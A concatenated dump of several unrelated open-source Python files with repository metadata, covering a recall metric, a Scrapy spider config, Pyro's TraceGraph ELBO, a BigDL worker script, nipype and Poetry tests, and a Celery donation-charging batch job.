if self._type == "multilabel":
self._true_positives = np.empty(0)
self._actual_positives = np.empty(0)
self._true_positives_average = 0
self._actual_positives_average = 0
else:
self._true_positives = 0
self._actual_positives = 0
def update(self, *inputs):
"""
Updates the internal evaluation result with `y_pred` and `y`.
Args:
inputs: Input `y_pred` and `y`. `y_pred` and `y` are a `Tensor`, a list or an array.
For 'classification' evaluation type, `y_pred` is in most cases (not strictly) a list
of floating numbers in range :math:`[0, 1]`
and the shape is :math:`(N, C)`, where :math:`N` is the number of cases and :math:`C`
is the number of categories. Shape of `y` can be :math:`(N, C)` with values 0 and 1 if one-hot
encoding is used or the shape is :math:`(N,)` with integer values if index of category is used.
For 'multilabel' evaluation type, `y_pred` and `y` can only be one-hot encoding with
values 0 or 1. Indices with 1 indicate positive category. The shape of `y_pred` and `y`
are both :math:`(N, C)`.
Raises:
ValueError: If the number of input is not 2.
"""
if len(inputs) != 2:
            raise ValueError('Recall needs 2 inputs (y_pred, y), but got {}'.format(len(inputs)))
y_pred = self._convert_data(inputs[0])
y = self._convert_data(inputs[1])
if self._type == 'classification' and y_pred.ndim == y.ndim and self._check_onehot_data(y):
y = y.argmax(axis=1)
self._check_shape(y_pred, y)
self._check_value(y_pred, y)
if self._class_num == 0:
self._class_num = y_pred.shape[1]
elif y_pred.shape[1] != self._class_num:
            raise ValueError('Class number does not match: the previous input contained {} classes, but the current '
                             'input contains {} classes'.format(self._class_num, y_pred.shape[1]))
class_num = self._class_num
if self._type == "classification":
if y.max() + 1 > class_num:
                raise ValueError('y_pred contains only {} classes, which is fewer than the {} classes found in y.'.
                                 format(class_num, y.max() + 1))
y = np.eye(class_num)[y.reshape(-1)]
indices = y_pred.argmax(axis=1).reshape(-1)
y_pred = np.eye(class_num)[indices]
elif self._type == "multilabel":
y_pred = y_pred.swapaxes(1, 0).reshape(class_num, -1)
y = y.swapaxes(1, 0).reshape(class_num, -1)
actual_positives = y.sum(axis=0)
true_positives = (y * y_pred).sum(axis=0)
if self._type == "multilabel":
self._true_positives_average += np.sum(true_positives / (actual_positives + self.eps))
self._actual_positives_average += len(actual_positives)
self._true_positives = np.concatenate((self._true_positives, true_positives), axis=0)
self._actual_positives = np.concatenate((self._actual_positives, actual_positives), axis=0)
else:
self._true_positives += true_positives
self._actual_positives += actual_positives
def eval(self, average=False):
"""
Computes the recall.
Args:
average (bool): Specify whether calculate the average recall. Default value is False.
Returns:
Float, the computed result.
"""
if self._class_num == 0:
            raise RuntimeError('The number of input samples cannot be 0.')
validator.check_value_type("average", average, [bool], self.__class__.__name__)
result = self._true_positives / (self._actual_positives + self.eps)
if average:
if self._type == "multilabel":
result = self._true_positives_average / (self._actual_positives_average + self.eps)
return result.mean()
return result
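# A standalone NumPy sketch (not part of this class) of the 'classification' path above:
# one-hot the argmax predictions and the labels, then divide per-class true positives by
# actual positives. The eps value here is illustrative, not the one used by the class.
import numpy as np

def per_class_recall(y_pred, y, eps=1e-12):
    class_num = y_pred.shape[1]
    y_onehot = np.eye(class_num)[y.reshape(-1)]              # ground truth, shape (N, C)
    pred_onehot = np.eye(class_num)[y_pred.argmax(axis=1)]   # hard predictions, shape (N, C)
    true_positives = (y_onehot * pred_onehot).sum(axis=0)    # per-class TP
    actual_positives = y_onehot.sum(axis=0)                  # per-class TP + FN
    return true_positives / (actual_positives + eps)

# Reproduces the docstring example: per-class recalls of approximately [1.0, 0.5]
print(per_class_recall(np.array([[0.2, 0.5], [0.3, 0.1], [0.9, 0.6]]), np.array([1, 0, 1])))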
| 42.516779
| 119
| 0.607893
|
bdb217079a02480c3d3cef4f194ad456f9124c1b
| 984
|
py
|
Python
|
scraper/storage_spiders/thefaceshop360com.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | null | null | null |
scraper/storage_spiders/thefaceshop360com.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | 10
|
2020-02-11T23:34:28.000Z
|
2022-03-11T23:16:12.000Z
|
scraper/storage_spiders/thefaceshop360com.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | 3
|
2018-08-05T14:54:25.000Z
|
2021-06-07T01:49:59.000Z
|
# Auto generated by generator.py. Delete this line if you make modification.
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
XPATH = {
'name' : "//h1[@class='tieu-de-san-pham']",
'price' : "//h2[@class='product-price-single']/span//span[@class='amount']",
'category' : "//div[@class='duongdan']//a",
'description' : "//li[@class='col-main-right']/div/div[@class='panel entry-content']/p",
'images' : "//div[@class='thumbnails']/a/@href",
'canonical' : "//link[@rel='canonical']/@href",
'base_url' : "",
'brand' : ""
}
name = 'thefaceshop360.com'
allowed_domains = ['thefaceshop360.com']
start_urls = ['http://thefaceshop360.com/']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = []
rules = [
Rule(LinkExtractor(allow=['/my-pham/[a-zA-Z0-9-]+']), 'parse_item'),
Rule(LinkExtractor(allow=['/danh-muc/']), 'parse'),
#Rule(LinkExtractor(), 'parse_item_and_links'),
]
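# A hedged sketch (not part of the generated module) of how the XPATH map above is
# typically applied inside a spider callback; `response` is assumed to be a
# scrapy.http.Response for a product page matched by the rules, and empty XPath entries
# (base_url, brand) are simply skipped.
def parse_item(response):
    item = {'link': response.url}
    for field, xpath in XPATH.items():
        if xpath:
            item[field] = response.xpath(xpath).getall()
    return item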
| 36.444444
| 92
| 0.639228
|
239e40ce8eec24f2ce97c6ed574268bba70a9e08
| 14,814
|
py
|
Python
|
pyro/infer/tracegraph_elbo.py
|
svenrdz/pyro
|
36c68ec55943f2bc1f586f7061c5c8d7ea93dd0f
|
[
"MIT"
] | 2
|
2020-04-11T04:30:55.000Z
|
2021-07-29T18:45:08.000Z
|
pyro/infer/tracegraph_elbo.py
|
svenrdz/pyro
|
36c68ec55943f2bc1f586f7061c5c8d7ea93dd0f
|
[
"MIT"
] | null | null | null |
pyro/infer/tracegraph_elbo.py
|
svenrdz/pyro
|
36c68ec55943f2bc1f586f7061c5c8d7ea93dd0f
|
[
"MIT"
] | null | null | null |
import weakref
from operator import itemgetter
import torch
import pyro
import pyro.ops.jit
from pyro.distributions.util import is_identically_zero
from pyro.infer import ELBO
from pyro.infer.enum import get_importance_trace
from pyro.infer.util import (MultiFrameTensor, detach_iterable, get_plate_stacks,
is_validation_enabled, torch_backward, torch_item)
from pyro.util import check_if_enumerated, warn_if_nan
def _get_baseline_options(site):
"""
Extracts baseline options from ``site["infer"]["baseline"]``.
"""
# XXX default for baseline_beta currently set here
options_dict = site["infer"].get("baseline", {}).copy()
options_tuple = (options_dict.pop('nn_baseline', None),
options_dict.pop('nn_baseline_input', None),
options_dict.pop('use_decaying_avg_baseline', False),
options_dict.pop('baseline_beta', 0.90),
options_dict.pop('baseline_value', None))
if options_dict:
raise ValueError("Unrecognized baseline options: {}".format(options_dict.keys()))
return options_tuple
def _construct_baseline(node, guide_site, downstream_cost):
# XXX should the average baseline be in the param store as below?
baseline = 0.0
baseline_loss = 0.0
(nn_baseline, nn_baseline_input, use_decaying_avg_baseline, baseline_beta,
baseline_value) = _get_baseline_options(guide_site)
use_nn_baseline = nn_baseline is not None
use_baseline_value = baseline_value is not None
use_baseline = use_nn_baseline or use_decaying_avg_baseline or use_baseline_value
assert(not (use_nn_baseline and use_baseline_value)), \
"cannot use baseline_value and nn_baseline simultaneously"
if use_decaying_avg_baseline:
dc_shape = downstream_cost.shape
param_name = "__baseline_avg_downstream_cost_" + node
with torch.no_grad():
avg_downstream_cost_old = pyro.param(param_name,
torch.zeros(dc_shape, device=guide_site['value'].device))
avg_downstream_cost_new = (1 - baseline_beta) * downstream_cost + \
baseline_beta * avg_downstream_cost_old
pyro.get_param_store()[param_name] = avg_downstream_cost_new
baseline += avg_downstream_cost_old
if use_nn_baseline:
# block nn_baseline_input gradients except in baseline loss
baseline += nn_baseline(detach_iterable(nn_baseline_input))
elif use_baseline_value:
# it's on the user to make sure baseline_value tape only points to baseline params
baseline += baseline_value
if use_nn_baseline or use_baseline_value:
# accumulate baseline loss
baseline_loss += torch.pow(downstream_cost.detach() - baseline, 2.0).sum()
if use_baseline:
if downstream_cost.shape != baseline.shape:
raise ValueError("Expected baseline at site {} to be {} instead got {}".format(
node, downstream_cost.shape, baseline.shape))
return use_baseline, baseline_loss, baseline
def _compute_downstream_costs(model_trace, guide_trace, non_reparam_nodes):
# recursively compute downstream cost nodes for all sample sites in model and guide
# (even though ultimately just need for non-reparameterizable sample sites)
# 1. downstream costs used for rao-blackwellization
# 2. model observe sites (as well as terms that arise from the model and guide having different
# dependency structures) are taken care of via 'children_in_model' below
topo_sort_guide_nodes = guide_trace.topological_sort(reverse=True)
topo_sort_guide_nodes = [x for x in topo_sort_guide_nodes
if guide_trace.nodes[x]["type"] == "sample"]
ordered_guide_nodes_dict = {n: i for i, n in enumerate(topo_sort_guide_nodes)}
downstream_guide_cost_nodes = {}
downstream_costs = {}
stacks = get_plate_stacks(model_trace)
for node in topo_sort_guide_nodes:
downstream_costs[node] = MultiFrameTensor((stacks[node],
model_trace.nodes[node]['log_prob'] -
guide_trace.nodes[node]['log_prob']))
nodes_included_in_sum = set([node])
downstream_guide_cost_nodes[node] = set([node])
# make more efficient by ordering children appropriately (higher children first)
children = [(k, -ordered_guide_nodes_dict[k]) for k in guide_trace.successors(node)]
sorted_children = sorted(children, key=itemgetter(1))
for child, _ in sorted_children:
child_cost_nodes = downstream_guide_cost_nodes[child]
downstream_guide_cost_nodes[node].update(child_cost_nodes)
if nodes_included_in_sum.isdisjoint(child_cost_nodes): # avoid duplicates
downstream_costs[node].add(*downstream_costs[child].items())
# XXX nodes_included_in_sum logic could be more fine-grained, possibly leading
# to speed-ups in case there are many duplicates
nodes_included_in_sum.update(child_cost_nodes)
missing_downstream_costs = downstream_guide_cost_nodes[node] - nodes_included_in_sum
# include terms we missed because we had to avoid duplicates
for missing_node in missing_downstream_costs:
downstream_costs[node].add((stacks[missing_node],
model_trace.nodes[missing_node]['log_prob'] -
guide_trace.nodes[missing_node]['log_prob']))
# finish assembling complete downstream costs
# (the above computation may be missing terms from model)
for site in non_reparam_nodes:
children_in_model = set()
for node in downstream_guide_cost_nodes[site]:
children_in_model.update(model_trace.successors(node))
# remove terms accounted for above
children_in_model.difference_update(downstream_guide_cost_nodes[site])
for child in children_in_model:
assert (model_trace.nodes[child]["type"] == "sample")
downstream_costs[site].add((stacks[child],
model_trace.nodes[child]['log_prob']))
downstream_guide_cost_nodes[site].update([child])
for k in non_reparam_nodes:
downstream_costs[k] = downstream_costs[k].sum_to(guide_trace.nodes[k]["cond_indep_stack"])
return downstream_costs, downstream_guide_cost_nodes
def _compute_elbo_reparam(model_trace, guide_trace):
# In ref [1], section 3.2, the part of the surrogate loss computed here is
# \sum{cost}, which in this case is the ELBO. Instead of using the ELBO,
# this implementation uses a surrogate ELBO which modifies some entropy
# terms depending on the parameterization. This reduces the variance of the
# gradient under some conditions.
elbo = 0.0
surrogate_elbo = 0.0
# Bring log p(x, z|...) terms into both the ELBO and the surrogate
for name, site in model_trace.nodes.items():
if site["type"] == "sample":
elbo += site["log_prob_sum"]
surrogate_elbo += site["log_prob_sum"]
# Bring log q(z|...) terms into the ELBO, and effective terms into the
# surrogate. Depending on the parameterization of a site, its log q(z|...)
# cost term may not contribute (in expectation) to the gradient. To reduce
# the variance under some conditions, the default entropy terms from
# site[`score_parts`] are used.
for name, site in guide_trace.nodes.items():
if site["type"] == "sample":
elbo -= site["log_prob_sum"]
entropy_term = site["score_parts"].entropy_term
# For fully reparameterized terms, this entropy_term is log q(z|...)
# For fully non-reparameterized terms, it is zero
if not is_identically_zero(entropy_term):
surrogate_elbo -= entropy_term.sum()
return elbo, surrogate_elbo
def _compute_elbo_non_reparam(guide_trace, non_reparam_nodes, downstream_costs):
# construct all the reinforce-like terms.
# we include only downstream costs to reduce variance
# optionally include baselines to further reduce variance
surrogate_elbo = 0.0
baseline_loss = 0.0
for node in non_reparam_nodes:
guide_site = guide_trace.nodes[node]
downstream_cost = downstream_costs[node]
score_function = guide_site["score_parts"].score_function
use_baseline, baseline_loss_term, baseline = _construct_baseline(node, guide_site, downstream_cost)
if use_baseline:
downstream_cost = downstream_cost - baseline
baseline_loss = baseline_loss + baseline_loss_term
surrogate_elbo += (score_function * downstream_cost.detach()).sum()
return surrogate_elbo, baseline_loss
class TraceGraph_ELBO(ELBO):
"""
A TraceGraph implementation of ELBO-based SVI. The gradient estimator
is constructed along the lines of reference [1] specialized to the case
of the ELBO. It supports arbitrary dependency structure for the model
and guide as well as baselines for non-reparameterizable random variables.
Where possible, conditional dependency information as recorded in the
:class:`~pyro.poutine.trace.Trace` is used to reduce the variance of the gradient estimator.
In particular two kinds of conditional dependency information are
used to reduce variance:
- the sequential order of samples (z is sampled after y => y does not depend on z)
- :class:`~pyro.plate` generators
References
[1] `Gradient Estimation Using Stochastic Computation Graphs`,
John Schulman, Nicolas Heess, Theophane Weber, Pieter Abbeel
[2] `Neural Variational Inference and Learning in Belief Networks`
Andriy Mnih, Karol Gregor
"""
def _get_trace(self, model, guide, *args, **kwargs):
"""
Returns a single trace from the guide, and the model that is run
against it.
"""
model_trace, guide_trace = get_importance_trace(
"dense", self.max_plate_nesting, model, guide, *args, **kwargs)
if is_validation_enabled():
check_if_enumerated(guide_trace)
return model_trace, guide_trace
def loss(self, model, guide, *args, **kwargs):
"""
:returns: returns an estimate of the ELBO
:rtype: float
Evaluates the ELBO with an estimator that uses num_particles many samples/particles.
"""
elbo = 0.0
for model_trace, guide_trace in self._get_traces(model, guide, *args, **kwargs):
elbo_particle = torch_item(model_trace.log_prob_sum()) - torch_item(guide_trace.log_prob_sum())
elbo += elbo_particle / float(self.num_particles)
loss = -elbo
warn_if_nan(loss, "loss")
return loss
def loss_and_grads(self, model, guide, *args, **kwargs):
"""
:returns: returns an estimate of the ELBO
:rtype: float
Computes the ELBO as well as the surrogate ELBO that is used to form the gradient estimator.
        Performs backward on the latter. num_particles many samples are used to form the estimators.
If baselines are present, a baseline loss is also constructed and differentiated.
"""
elbo, surrogate_loss = self._loss_and_surrogate_loss(model, guide, *args, **kwargs)
torch_backward(surrogate_loss, retain_graph=self.retain_graph)
elbo = torch_item(elbo)
loss = -elbo
warn_if_nan(loss, "loss")
return loss
def _loss_and_surrogate_loss(self, model, guide, *args, **kwargs):
loss = 0.0
surrogate_loss = 0.0
for model_trace, guide_trace in self._get_traces(model, guide, *args, **kwargs):
lp, slp = self._loss_and_surrogate_loss_particle(model_trace, guide_trace, *args, **kwargs)
loss += lp
surrogate_loss += slp
loss /= self.num_particles
surrogate_loss /= self.num_particles
return loss, surrogate_loss
def _loss_and_surrogate_loss_particle(self, model_trace, guide_trace, *args, **kwargs):
# compute elbo for reparameterized nodes
elbo, surrogate_elbo = _compute_elbo_reparam(model_trace, guide_trace)
baseline_loss = 0.0
# the following computations are only necessary if we have non-reparameterizable nodes
non_reparam_nodes = set(guide_trace.nonreparam_stochastic_nodes)
if non_reparam_nodes:
downstream_costs, _ = _compute_downstream_costs(model_trace, guide_trace, non_reparam_nodes)
surrogate_elbo_term, baseline_loss = _compute_elbo_non_reparam(guide_trace,
non_reparam_nodes,
downstream_costs)
surrogate_elbo += surrogate_elbo_term
surrogate_loss = -surrogate_elbo + baseline_loss
return elbo, surrogate_loss
class JitTraceGraph_ELBO(TraceGraph_ELBO):
"""
Like :class:`TraceGraph_ELBO` but uses :func:`torch.jit.trace` to
compile :meth:`loss_and_grads`.
This works only for a limited set of models:
- Models must have static structure.
- Models must not depend on any global data (except the param store).
- All model inputs that are tensors must be passed in via ``*args``.
- All model inputs that are *not* tensors must be passed in via
``**kwargs``, and compilation will be triggered once per unique
``**kwargs``.
"""
def loss_and_grads(self, model, guide, *args, **kwargs):
kwargs['_pyro_model_id'] = id(model)
kwargs['_pyro_guide_id'] = id(guide)
if getattr(self, '_jit_loss_and_surrogate_loss', None) is None:
# build a closure for loss_and_surrogate_loss
weakself = weakref.ref(self)
@pyro.ops.jit.trace(ignore_warnings=self.ignore_jit_warnings,
jit_options=self.jit_options)
def jit_loss_and_surrogate_loss(*args, **kwargs):
kwargs.pop('_pyro_model_id')
kwargs.pop('_pyro_guide_id')
self = weakself()
return self._loss_and_surrogate_loss(model, guide, *args, **kwargs)
self._jit_loss_and_surrogate_loss = jit_loss_and_surrogate_loss
loss, surrogate_loss = self._jit_loss_and_surrogate_loss(*args, **kwargs)
surrogate_loss.backward(retain_graph=self.retain_graph) # triggers jit compilation
loss = loss.item()
warn_if_nan(loss, "loss")
return loss
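# A minimal usage sketch (not part of this module): SVI with TraceGraph_ELBO on a toy
# model containing a non-reparameterizable Bernoulli latent, which is where the
# downstream-cost and baseline machinery above comes into play. The model, guide and
# hyperparameters are illustrative only.
import torch
from torch.distributions import constraints

import pyro
import pyro.distributions as dist
from pyro.infer import SVI, TraceGraph_ELBO
from pyro.optim import Adam

data = torch.tensor([1.0, 1.0, 0.0, 1.0])

def toy_model(data):
    z = pyro.sample("z", dist.Bernoulli(0.5))          # non-reparameterizable latent
    loc = 2.0 * z - 1.0
    with pyro.plate("data", len(data)):
        pyro.sample("x", dist.Normal(loc, 1.0), obs=data)

def toy_guide(data):
    p = pyro.param("p", torch.tensor(0.5), constraint=constraints.unit_interval)
    # request the decaying-average baseline handled by _construct_baseline above
    pyro.sample("z", dist.Bernoulli(p),
                infer={"baseline": {"use_decaying_avg_baseline": True, "baseline_beta": 0.9}})

svi = SVI(toy_model, toy_guide, Adam({"lr": 0.05}), loss=TraceGraph_ELBO())
for _ in range(100):
    svi.step(data)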
| 44.089286
| 107
| 0.671662
|
d9fd61f431c861b2e631d734a651819a77fbcd9a
| 1,025
|
py
|
Python
|
python/nano/src/bigdl/nano/automl/utils/parallel_worker.py
|
Forest216/BigDL
|
840da9a2eaf395978dd83730b02aa5e5dfbd7989
|
[
"Apache-2.0"
] | null | null | null |
python/nano/src/bigdl/nano/automl/utils/parallel_worker.py
|
Forest216/BigDL
|
840da9a2eaf395978dd83730b02aa5e5dfbd7989
|
[
"Apache-2.0"
] | null | null | null |
python/nano/src/bigdl/nano/automl/utils/parallel_worker.py
|
Forest216/BigDL
|
840da9a2eaf395978dd83730b02aa5e5dfbd7989
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import cloudpickle
from pytorch_lightning.utilities.seed import reset_seed
if __name__ == '__main__':
temp_dir = sys.argv[1]
with open(os.path.join(temp_dir, "search_kwargs.pkl"), 'rb') as f:
kwargs = cloudpickle.load(f)
with open(os.path.join(temp_dir, "search_func.pkl"), 'rb') as f:
func = cloudpickle.load(f)
# do we need to reset seed?
# reset_seed()
func(**kwargs)
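# A minimal launcher-side sketch (an assumption, not BigDL's actual launcher code) of the
# counterpart this worker expects: pickle the function and its kwargs into a temporary
# directory, then spawn this script with that directory as argv[1]. The helper name and
# the worker script path are illustrative.
import os
import subprocess
import sys
import tempfile

import cloudpickle

def launch_parallel_worker(func, worker_script="parallel_worker.py", **kwargs):
    temp_dir = tempfile.mkdtemp()
    with open(os.path.join(temp_dir, "search_kwargs.pkl"), "wb") as f:
        cloudpickle.dump(kwargs, f)
    with open(os.path.join(temp_dir, "search_func.pkl"), "wb") as f:
        cloudpickle.dump(func, f)
    subprocess.run([sys.executable, worker_script, temp_dir], check=True)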
| 28.472222
| 74
| 0.717073
|
0114c5efe0ec118560ed9b1a344bc334936c803c
| 1,559
|
py
|
Python
|
nipype/interfaces/mrtrix3/tests/test_auto_DWIExtract.py
|
felixsc1/nipype
|
e722d6170593583f16ddfcb95473e5d30b5f1d7c
|
[
"Apache-2.0"
] | 8
|
2019-05-29T09:38:30.000Z
|
2021-01-20T03:36:59.000Z
|
nipype/interfaces/mrtrix3/tests/test_auto_DWIExtract.py
|
felixsc1/nipype
|
e722d6170593583f16ddfcb95473e5d30b5f1d7c
|
[
"Apache-2.0"
] | 12
|
2021-03-09T03:01:16.000Z
|
2022-03-11T23:59:36.000Z
|
nipype/interfaces/mrtrix3/tests/test_auto_DWIExtract.py
|
felixsc1/nipype
|
e722d6170593583f16ddfcb95473e5d30b5f1d7c
|
[
"Apache-2.0"
] | 1
|
2020-07-17T12:49:49.000Z
|
2020-07-17T12:49:49.000Z
|
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..utils import DWIExtract
def test_DWIExtract_inputs():
input_map = dict(
args=dict(argstr='%s', ),
bval_scale=dict(argstr='-bvalue_scaling %s', ),
bzero=dict(argstr='-bzero', ),
environ=dict(
nohash=True,
usedefault=True,
),
grad_file=dict(argstr='-grad %s', ),
grad_fsl=dict(argstr='-fslgrad %s %s', ),
in_bval=dict(),
in_bvec=dict(argstr='-fslgrad %s %s', ),
in_file=dict(
argstr='%s',
mandatory=True,
position=-2,
),
nobzero=dict(argstr='-no_bzero', ),
nthreads=dict(
argstr='-nthreads %d',
nohash=True,
),
out_file=dict(
argstr='%s',
mandatory=True,
position=-1,
),
shell=dict(
argstr='-shell %s',
sep=',',
),
singleshell=dict(argstr='-singleshell', ),
)
inputs = DWIExtract.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_DWIExtract_outputs():
output_map = dict(out_file=dict(), )
outputs = DWIExtract.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
| 29.980769
| 67
| 0.54907
|
66b0dae9b697ea9d4dcd8164e5632a1903e34643
| 4,415
|
py
|
Python
|
tests/console/commands/test_config.py
|
AWhetter/poetry
|
b1d380ec63ef43a2b59c52d10f9733b50eca9081
|
[
"MIT"
] | null | null | null |
tests/console/commands/test_config.py
|
AWhetter/poetry
|
b1d380ec63ef43a2b59c52d10f9733b50eca9081
|
[
"MIT"
] | null | null | null |
tests/console/commands/test_config.py
|
AWhetter/poetry
|
b1d380ec63ef43a2b59c52d10f9733b50eca9081
|
[
"MIT"
] | null | null | null |
import json
import os
import pytest
from poetry.config.config_source import ConfigSource
from poetry.core.pyproject.exceptions import PyProjectException
from poetry.factory import Factory
@pytest.fixture()
def tester(command_tester_factory):
return command_tester_factory("config")
def test_show_config_with_local_config_file_empty(tester, mocker):
mocker.patch(
"poetry.factory.Factory.create_poetry",
side_effect=PyProjectException("[tool.poetry] section not found"),
)
tester.execute()
assert "" == tester.io.fetch_output()
def test_list_displays_default_value_if_not_set(tester, config, config_cache_dir):
tester.execute("--list")
expected = """cache-dir = {cache}
experimental.new-installer = true
installer.parallel = true
virtualenvs.create = true
virtualenvs.in-project = null
virtualenvs.options.always-copy = false
virtualenvs.path = {path} # {virtualenvs}
""".format(
cache=json.dumps(str(config_cache_dir)),
path=json.dumps(os.path.join("{cache-dir}", "virtualenvs")),
virtualenvs=str(config_cache_dir / "virtualenvs"),
)
assert expected == tester.io.fetch_output()
def test_list_displays_set_get_setting(tester, config, config_cache_dir):
tester.execute("virtualenvs.create false")
tester.execute("--list")
expected = """cache-dir = {cache}
experimental.new-installer = true
installer.parallel = true
virtualenvs.create = false
virtualenvs.in-project = null
virtualenvs.options.always-copy = false
virtualenvs.path = {path} # {virtualenvs}
""".format(
cache=json.dumps(str(config_cache_dir)),
path=json.dumps(os.path.join("{cache-dir}", "virtualenvs")),
virtualenvs=str(config_cache_dir / "virtualenvs"),
)
assert 0 == config.set_config_source.call_count
assert expected == tester.io.fetch_output()
def test_display_single_setting(tester, config):
tester.execute("virtualenvs.create")
expected = """true
"""
assert expected == tester.io.fetch_output()
def test_display_single_local_setting(command_tester_factory, fixture_dir):
tester = command_tester_factory(
"config", poetry=Factory().create_poetry(fixture_dir("with_local_config"))
)
tester.execute("virtualenvs.create")
expected = """false
"""
assert expected == tester.io.fetch_output()
def test_list_displays_set_get_local_setting(tester, config, config_cache_dir):
tester.execute("virtualenvs.create false --local")
tester.execute("--list")
expected = """cache-dir = {cache}
experimental.new-installer = true
installer.parallel = true
virtualenvs.create = false
virtualenvs.in-project = null
virtualenvs.options.always-copy = false
virtualenvs.path = {path} # {virtualenvs}
""".format(
cache=json.dumps(str(config_cache_dir)),
path=json.dumps(os.path.join("{cache-dir}", "virtualenvs")),
virtualenvs=str(config_cache_dir / "virtualenvs"),
)
assert 1 == config.set_config_source.call_count
assert expected == tester.io.fetch_output()
def test_set_pypi_token(tester, auth_config_source):
tester.execute("pypi-token.pypi mytoken")
tester.execute("--list")
assert "mytoken" == auth_config_source.config["pypi-token"]["pypi"]
def test_set_client_cert(tester, auth_config_source, mocker):
mocker.spy(ConfigSource, "__init__")
tester.execute("certificates.foo.client-cert path/to/cert.pem")
assert (
"path/to/cert.pem"
== auth_config_source.config["certificates"]["foo"]["client-cert"]
)
def test_set_cert(tester, auth_config_source, mocker):
mocker.spy(ConfigSource, "__init__")
tester.execute("certificates.foo.cert path/to/ca.pem")
assert "path/to/ca.pem" == auth_config_source.config["certificates"]["foo"]["cert"]
def test_config_installer_parallel(tester, command_tester_factory):
tester.execute("--local installer.parallel")
assert tester.io.fetch_output().strip() == "true"
workers = command_tester_factory(
"install"
)._command._installer._executor._max_workers
assert workers > 1
tester.io.clear_output()
tester.execute("--local installer.parallel false")
tester.execute("--local installer.parallel")
assert tester.io.fetch_output().strip() == "false"
workers = command_tester_factory(
"install"
)._command._installer._executor._max_workers
assert workers == 1
| 28.668831
| 87
| 0.719366
|
b8e8904722a39c0ccad2e548d8ca749c8f3adbe7
| 3,711
|
py
|
Python
|
batch-tmp.py
|
MinnPost/donations
|
075d3a764e21022e247a4aa1066c234c7ab4f68b
|
[
"MIT"
] | 2
|
2021-06-02T06:54:38.000Z
|
2021-11-29T19:37:55.000Z
|
batch-tmp.py
|
MinnPost/donations
|
075d3a764e21022e247a4aa1066c234c7ab4f68b
|
[
"MIT"
] | 17
|
2020-10-20T22:40:45.000Z
|
2021-06-25T13:30:49.000Z
|
batch-tmp.py
|
MinnPost/donations
|
075d3a764e21022e247a4aa1066c234c7ab4f68b
|
[
"MIT"
] | 1
|
2021-01-08T02:23:35.000Z
|
2021-01-08T02:23:35.000Z
|
import logging
from config import ACCOUNTING_MAIL_RECIPIENT, LOG_LEVEL, REDIS_TLS_URL, TIMEZONE
from datetime import datetime, timedelta
from pytz import timezone
import celery
import redis
from charges import amount_to_charge, charge, ChargeException
from npsp import Opportunity
from util import send_email
zone = timezone(TIMEZONE)
log_level = logging.getLevelName(LOG_LEVEL)
root = logging.getLogger()
root.setLevel(log_level)
class Log(object):
"""
    This encapsulates sending to the console/stdout and email all in one.
"""
def __init__(self):
self.log = list()
def it(self, string):
"""
Add something to the log.
"""
logging.debug(string)
self.log.append(string)
def send(self):
"""
Send the assembled log out as an email.
"""
body = "\n".join(self.log)
recipient = ACCOUNTING_MAIL_RECIPIENT
subject = "Batch run"
send_email(body=body, recipient=recipient, subject=subject)
class AlreadyExecuting(Exception):
"""
Here to show when more than one job of the same type is running.
"""
pass
class Lock(object):
"""
    Claim an exclusive lock using Redis.
"""
def __init__(self, key):
self.key = key
self.connection = redis.from_url(REDIS_TLS_URL)
def acquire(self):
if self.connection.get(self.key):
raise AlreadyExecuting
self.connection.setex(name=self.key, value="bar", time=1200)
def release(self):
self.connection.delete(self.key)
# TODO stop sending this email and just rely on Sentry and logs?
@celery.task()
def charge_cards():
lock = Lock(key="charge-cards-lock")
lock.acquire()
log = Log()
log.it("---Starting batch card job...")
ten_days_ago = (datetime.now(tz=zone) - timedelta(days=10)).strftime("%Y-%m-%d")
today = datetime.now(tz=zone).strftime("%Y-%m-%d")
opportunities = Opportunity.list(begin=ten_days_ago, end=today)
log.it("---Processing charges...")
log.it(f"Found {len(opportunities)} opportunities available to process.")
for opportunity in opportunities:
if not opportunity.stripe_customer_id:
continue
amount = amount_to_charge(opportunity)
log.it(
f"---- Charging ${amount} to {opportunity.stripe_customer_id} ({opportunity.name})"
)
try:
charge(opportunity)
except ChargeException as e:
logging.info("Batch charge error")
e.send_slack_notification()
log.send()
lock.release()
@celery.task()
def update_ach_charges():
lock = Lock(key="update-ach-charges-lock")
lock.acquire()
log = Log()
log.it('---Starting batch ach job...')
log.it('---Checking for status changes on ACH charges...')
ten_days_ago = (datetime.now(tz=zone) - timedelta(days=10)).strftime("%Y-%m-%d")
today = datetime.now(tz=zone).strftime("%Y-%m-%d")
opportunities = Opportunity.list(begin=ten_days_ago, end=today)
log.it("---Processing charges...")
log.it(f"Found {len(opportunities)} opportunities available to process.")
for opportunity in opportunities:
if not opportunity.stripe_customer_id:
continue
amount = amount_to_charge(opportunity)
log.it(
f"---- ACH Charging ${amount} to {opportunity.stripe_customer_id} ({opportunity.name})"
)
try:
charge(opportunity)
except ChargeException as e:
logging.info("ACH batch charge error")
e.send_slack_notification()
log.send()
lock.release()
if __name__ == "__main__":
charge_cards()
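# A hedged usage sketch (not in this file) of the Lock/AlreadyExecuting pattern that the
# two tasks above rely on; the key name is illustrative.
def guarded_batch_run():
    lock = Lock(key="example-batch-lock")
    try:
        lock.acquire()                 # raises AlreadyExecuting if the key is already set
    except AlreadyExecuting:
        logging.info("Another batch job is still running; skipping this run.")
        return
    try:
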